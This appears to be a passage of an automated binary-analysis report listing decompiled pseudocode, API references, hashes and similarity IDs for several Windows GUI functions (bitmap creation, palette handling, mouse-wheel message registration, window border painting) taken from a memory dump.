                                            • Instruction Fuzzy Hash: 5051ECB1E00714ABDB10EFF8CC95FAEB7BCEB8A700F144465B614E7281D6759940CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009636C4, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E009636C4(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E009426FC(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x963be1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x963bb4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E009430FC(1);
						if(_a4 == 0) {
							E00942B40( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00958B64(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t261 = _v64;
					E00942B40(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E00960794();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E00958AF4(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E00960A18( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E00958AF4(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E00960A38( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00960CE0(_v32);
				}
				_v16 = E009608A8(GetDC(0));
				_push(_t333);
				_push(0x963b2f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x99a460 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0094C910(_t255, _t267, _t327, _t331);
							} else {
								E00960794();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E00958AF4(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x963afe;
						 *[fs:eax] = _t300;
						_push(0x963b36);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E009426FC(_t331);
					_push(_t333);
					_push(0x963a97);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E00958AF4(_v12, _t331, _v24);
					_v20 = E009608A8(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E00960F98(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x963a6b);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0094C910(_t255, _t273, _t327, _t331);
						} else {
							E00960794();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x963a72);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}














































                                            0x009636c4
                                            0x009636c5
                                            0x009636c7
                                            0x009636d0
                                            0x009636d2
                                            0x009636d5
                                            0x009636da
                                            0x009636df
                                            0x009636e4
                                            0x009636f4
                                            0x009636fb
                                            0x00963703
                                            0x00963705
                                            0x00963705
                                            0x0096371c
                                            0x00963722
                                            0x00963727
                                            0x00963728
                                            0x0096372d
                                            0x00963730
                                            0x00963735
                                            0x00963736
                                            0x0096373b
                                            0x0096373e
                                            0x00963745
                                            0x009637a4
                                            0x009637a7
                                            0x009637ad
                                            0x009637b3
                                            0x009637cd
                                            0x009637d4
                                            0x009637e3
                                            0x009637e8
                                            0x009637f6
                                            0x00963802
                                            0x00963802
                                            0x00963812
                                            0x00963822
                                            0x00963836
                                            0x00963845
                                            0x00963857
                                            0x0096385d
                                            0x0096385d
                                            0x00963747
                                            0x00963757
                                            0x0096375a
                                            0x00963766
                                            0x0096376b
                                            0x00963771
                                            0x00963778
                                            0x0096377f
                                            0x00963787
                                            0x0096378b
                                            0x0096378b
                                            0x00963860
                                            0x00963866
                                            0x0096386e
                                            0x00963876
                                            0x00963878
                                            0x00963878
                                            0x00963881
                                            0x00963883
                                            0x0096388b
                                            0x00963897
                                            0x009638a4
                                            0x009638a9
                                            0x009638ad
                                            0x009638ad
                                            0x00963897
                                            0x0096388b
                                            0x009638b4
                                            0x009638bf
                                            0x009638bf
                                            0x009638c5
                                            0x009638d1
                                            0x009638da
                                            0x009638ec
                                            0x009638f2
                                            0x009638f4
                                            0x00963900
                                            0x0096390a
                                            0x0096390f
                                            0x00963912
                                            0x00963912
                                            0x00963915
                                            0x0096391a
                                            0x0096391c
                                            0x0096391c
                                            0x00963922
                                            0x00963927
                                            0x00963927
                                            0x00963938
                                            0x0096393d
                                            0x0096393e
                                            0x00963943
                                            0x00963946
                                            0x0096394c
                                            0x00963951
                                            0x0096395f
                                            0x00963ab5
                                            0x00963abc
                                            0x00963acb
                                            0x00963ad4
                                            0x00963acd
                                            0x00963acd
                                            0x00963acd
                                            0x00963acb
                                            0x00963adb
                                            0x00963ae1
                                            0x00963ae4
                                            0x00963aef
                                            0x00963af6
                                            0x00963af9
                                            0x00963b18
                                            0x00963b1b
                                            0x00963b1e
                                            0x00963b2e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00963965
                                            0x00963965
                                            0x00963967
                                            0x00963971
                                            0x00963976
                                            0x00963977
                                            0x0096397c
                                            0x0096397f
                                            0x00963985
                                            0x0096398a
                                            0x0096399d
                                            0x009639b7
                                            0x009639bc
                                            0x009639c2
                                            0x009639c7
                                            0x009639c9
                                            0x009639d5
                                            0x009639e7
                                            0x009639ee
                                            0x009639ee
                                            0x009639f5
                                            0x009639f6
                                            0x009639fb
                                            0x009639fe
                                            0x00963a17
                                            0x00963a1e
                                            0x00963a27
                                            0x00963a30
                                            0x00963a29
                                            0x00963a29
                                            0x00963a29
                                            0x00963a27
                                            0x00963a37
                                            0x00963a3a
                                            0x00963a3d
                                            0x00963a46
                                            0x00963a52
                                            0x00963a52
                                            0x00963a6a
                                            0x00963a6a

                                            APIs
                                            • GetDC.USER32 ref: 0096392E
                                            • CreateCompatibleDC.GDI32(00000001), ref: 00963993
                                            • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 009639A8
                                            • SelectObject.GDI32(?,00000000), ref: 009639B2
                                            • SelectPalette.GDI32(?,?,00000000), ref: 009639E2
                                            • RealizePalette.GDI32(?), ref: 009639EE
                                            • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00963A12
                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00963A6B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00963A20
                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00963A52
                                            • SelectObject.GDI32(?,?), ref: 00963A5F
                                            • DeleteObject.GDI32(00000000), ref: 00963A65
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                            • String ID: ($BM
                                            • API String ID: 2831685396-2980357723
                                            • Opcode ID: 8c09cb832e3fc4e57e6f6b813897866d2cfdf38724c6c861ec059ff5a602e127
                                            • Instruction ID: 2d7819d1e3878e45220bf87c55313d7e73d9e2c2b9219495a798f22dcd286be2
                                            • Opcode Fuzzy Hash: 8c09cb832e3fc4e57e6f6b813897866d2cfdf38724c6c861ec059ff5a602e127
                                            • Instruction Fuzzy Hash: E6D126B4E00248AFDF14DFA8C985BAEBBB5FF89300F048465F904EB295DB749944CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00962EAC, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E00962EAC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				char _t87;
				void* _t94;
				void* _t140;
				intOrPtr* _t170;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				int* _t190;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				intOrPtr _t196;

				_t171 = __ecx;
				_t194 = _t195;
				_t196 = _t195 + 0xffffffe4;
				_t190 = __ecx;
				_v8 = __edx;
				_t170 = __eax;
				_t192 =  *((intOrPtr*)(__eax + 0x28));
				_t178 =  *0x9630f8; // 0xf
				E00960590(_v8, __ecx, _t178);
				E0096343C(_t170);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *(_t192 + 0x10);
				if(_t78 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t85);
				_t86 = _t85 * _t84;
				if(_t86 > 8) {
					L4:
					_t87 = 0;
				} else {
					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
						_t87 = 1;
					} else {
						goto L4;
					}
				}
				if(_t87 == 0) {
					if(E00963238(_t170) == 0) {
						SetStretchBltMode(E009604BC(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t194);
				_push(0x9630e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196;
				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
					E009633DC(_t170, _t171);
				}
				_t94 = E0096317C(_t170);
				_t182 =  *0x9630f8; // 0xf
				E00960590(_t94, _t171, _t182);
				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E0096317C(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
					_pop(_t184);
					 *[fs:eax] = _t184;
					_push(0x9630ef);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t194);
					_push(0x96307d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t196;
					_v28 = E009608A8(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
					E00960A4C( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E0096317C(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
					_t140 = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(0x9630c2);
					if(_v32 != 0) {
						_t140 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t140;
				}
			}


























                                            0x00962eac
                                            0x00962ead
                                            0x00962eaf
                                            0x00962eb5
                                            0x00962eb7
                                            0x00962eba
                                            0x00962ebc
                                            0x00962ebf
                                            0x00962ec8
                                            0x00962ecf
                                            0x00962ed6
                                            0x00962ed9
                                            0x00962edd
                                            0x00962ee2
                                            0x00962ef3
                                            0x00962efd
                                            0x00962f02
                                            0x00962f02
                                            0x00962f14
                                            0x00962f1e
                                            0x00962f25
                                            0x00962f26
                                            0x00962f2b
                                            0x00962f3c
                                            0x00962f3c
                                            0x00962f2d
                                            0x00962f31
                                            0x00962f3a
                                            0x00962f40
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00962f3a
                                            0x00962f44
                                            0x00962f87
                                            0x00962f94
                                            0x00962f94
                                            0x00962f46
                                            0x00962f51
                                            0x00962f5f
                                            0x00962f77
                                            0x00962f77
                                            0x00962f9b
                                            0x00962f9c
                                            0x00962fa1
                                            0x00962fa4
                                            0x00962fb0
                                            0x00962fb4
                                            0x00962fb4
                                            0x00962fbb
                                            0x00962fc0
                                            0x00962fc6
                                            0x00962fd4
                                            0x009630bd
                                            0x009630c4
                                            0x009630c7
                                            0x009630ca
                                            0x009630d3
                                            0x00000000
                                            0x009630e2
                                            0x009630e7
                                            0x00962fda
                                            0x00962fdc
                                            0x00962fe1
                                            0x00962fe6
                                            0x00962fe7
                                            0x00962fec
                                            0x00962fef
                                            0x00962ffe
                                            0x0096300e
                                            0x00963048
                                            0x0096304d
                                            0x0096304f
                                            0x00963052
                                            0x00963055
                                            0x0096305e
                                            0x00963068
                                            0x00963068
                                            0x00963071
                                            0x00000000
                                            0x00963077
                                            0x0096307c
                                            0x0096307c

                                            APIs
                                              • Part of subcall function 0096343C: GetDC.USER32 ref: 00963492
                                              • Part of subcall function 0096343C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009634A7
                                              • Part of subcall function 0096343C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 009634B1
                                              • Part of subcall function 0096343C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00962073,00000000,009620FF), ref: 009634D5
                                              • Part of subcall function 0096343C: ReleaseDC.USER32 ref: 009634E0
                                            • SelectPalette.GDI32(?,?,000000FF), ref: 00962EEE
                                            • RealizePalette.GDI32(?), ref: 00962EFD
                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 00962F0F
                                            • GetDeviceCaps.GDI32(?,0000000E), ref: 00962F1E
                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00962F51
                                            • SetStretchBltMode.GDI32(?,00000004), ref: 00962F5F
                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00962F77
                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 00962F94
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00962FF4
                                            • SelectObject.GDI32(?,?), ref: 00963009
                                            • SelectObject.GDI32(?,00000000), ref: 00963068
                                            • DeleteDC.GDI32(00000000), ref: 00963077
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                            • String ID:
                                            • API String ID: 2414602066-0
                                            • Opcode ID: 89cb7e216bdb4bf23f9837f448ba345f1e23a06b8c331ad1d95bad7aac8f69c7
                                            • Instruction ID: 54c2e7226718bacaeaad6f95c437a3cbb106472dc1fa9202cb1090c54c876fab
                                            • Opcode Fuzzy Hash: 89cb7e216bdb4bf23f9837f448ba345f1e23a06b8c331ad1d95bad7aac8f69c7
                                            • Instruction Fuzzy Hash: 247117B5A04205AFDB50DFACC986F5EBBF8AF89300F158565F508DB292D635EE04CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009608B8, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E009608B8(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x960a06);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E00960800(_t77);
					}
					_push(_t93);
					_push(0x960975);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E00960800(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x96097c);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(0x960a0d);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}




















                                            0x009608b9
                                            0x009608bb
                                            0x009608c6
                                            0x009608c7
                                            0x009608c8
                                            0x009608ca
                                            0x009608d4
                                            0x009608de
                                            0x009608e3
                                            0x009608e4
                                            0x009608e9
                                            0x009608ec
                                            0x009608f9
                                            0x00960900
                                            0x00960921
                                            0x00960928
                                            0x0096092a
                                            0x0096092a
                                            0x00960931
                                            0x00960932
                                            0x00960937
                                            0x0096093a
                                            0x0096094e
                                            0x00960955
                                            0x00960957
                                            0x00960957
                                            0x0096095e
                                            0x00960961
                                            0x00960964
                                            0x00960974
                                            0x00960902
                                            0x00960915
                                            0x00960980
                                            0x0096098f
                                            0x0096099e
                                            0x009609c5
                                            0x009609cc
                                            0x009609d3
                                            0x009609d3
                                            0x009609da
                                            0x009609e1
                                            0x009609e1
                                            0x009609da
                                            0x009609e8
                                            0x009609eb
                                            0x009609ee
                                            0x009609f7
                                            0x00960a05
                                            0x00960a05

                                            APIs
                                            • CreateCompatibleDC.GDI32(00000000), ref: 009608CF
                                            • CreateCompatibleDC.GDI32(00000000), ref: 009608D9
                                            • GetObjectA.GDI32(?,00000018,?), ref: 009608F9
                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00960910
                                            • GetDC.USER32 ref: 0096091C
                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00960949
                                            • ReleaseDC.USER32 ref: 0096096F
                                            • SelectObject.GDI32(?,?), ref: 0096098A
                                            • SelectObject.GDI32(?,00000000), ref: 00960999
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 009609C5
                                            • SelectObject.GDI32(?,00000000), ref: 009609D3
                                            • SelectObject.GDI32(?,00000000), ref: 009609E1
                                            • DeleteDC.GDI32(?), ref: 009609F7
                                            • DeleteDC.GDI32(?), ref: 00960A00
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                            • String ID:
                                            • API String ID: 644427674-0
                                            • Opcode ID: 015be82c2f1f9f9a93b09c73b8a99a7d881493cb5cdc68d5407f5fa0358c0ecb
                                            • Instruction ID: 500156ac7896a99401602a2a938762fc56c6d58f889129c5d669e0344011b79f
                                            • Opcode Fuzzy Hash: 015be82c2f1f9f9a93b09c73b8a99a7d881493cb5cdc68d5407f5fa0358c0ecb
                                            • Instruction Fuzzy Hash: 5B41FEB2E40309AFEB50DBE8CC86FAFB7BCEB89700F100455B614E7282D6759900CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00946C9C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00946C9C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                            0x00946ca3
                                            0x00946ca5
                                            0x00946ca7
                                            0x00946cb9
                                            0x00946cc8
                                            0x00946cd4
                                            0x00946ce0
                                            0x00946ce5
                                            0x00946d04
                                            0x00946ceb
                                            0x00946cfb
                                            0x00946cfb
                                            0x00946d09
                                            0x00946d26
                                            0x00946d0f
                                            0x00946d1f
                                            0x00946d1f
                                            0x00946d33

                                            APIs
                                            • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00946CB4
                                            • RegisterClipboardFormatA.USER32 ref: 00946CC0
                                            • RegisterClipboardFormatA.USER32 ref: 00946CCF
                                            • RegisterClipboardFormatA.USER32 ref: 00946CDB
                                            • SendMessageA.USER32 ref: 00946CF3
                                            • SendMessageA.USER32 ref: 00946D17
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                            • API String ID: 1416857345-3736581797
                                            • Opcode ID: 9634c0d334fe93a8d5df4b90911f3bafb496ddf5f6ed5c2e4f64e4feb5ca2353
                                            • Instruction ID: 817a8f184a1af92a5474655e2f88686e6f3b87711502f0a61d92fb9864a82091
                                            • Opcode Fuzzy Hash: 9634c0d334fe93a8d5df4b90911f3bafb496ddf5f6ed5c2e4f64e4feb5ca2353
                                            • Instruction Fuzzy Hash: C3112EF1740305AFE7149F68DC82F66BBA8EF86714F104535F9849B2C1D6B15C40CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009695C4, Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E009695C4(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				signed int _t79;
				int _t80;
				int _t81;
				void* _t94;
				intOrPtr _t107;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t122 = _t124;
				_t125 = _t124 + 0xffffffbc;
				_t94 = __ecx;
				_v8 = __edx;
				_t116 = __eax;
				_t43 = GetWindowLongA(E00975D08(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00975D08(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_v12 = GetWindowDC(E00975D08(_v8));
					_push(_t122);
					_push(0x96971f);
					_push( *[fs:edx]);
					 *[fs:edx] = _t125;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t119 = _t116;
					if(_t94 != 0) {
						_t79 = GetWindowLongA(E00975D08(_v8), 0xfffffff0);
						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
							_t80 = GetSystemMetrics(2);
							_t81 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00955854(_v28.right - _t80, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t119 = _t119;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E009691FC( &_v56, 2);
					E00969150(_t119,  &_v56, _v12, 0,  &_v44);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x969726);
					return ReleaseDC(E00975D08(_v8), _v12);
				}
			}




















                                            0x009695c5
                                            0x009695c7
                                            0x009695cd
                                            0x009695cf
                                            0x009695d2
                                            0x009695df
                                            0x009695e7
                                            0x0096972c
                                            0x009695ed
                                            0x009695fa
                                            0x0096960f
                                            0x00969622
                                            0x00969627
                                            0x00969628
                                            0x0096962d
                                            0x00969630
                                            0x0096963a
                                            0x0096963b
                                            0x0096963c
                                            0x0096963d
                                            0x0096963e
                                            0x00969641
                                            0x0096964e
                                            0x00969658
                                            0x00969663
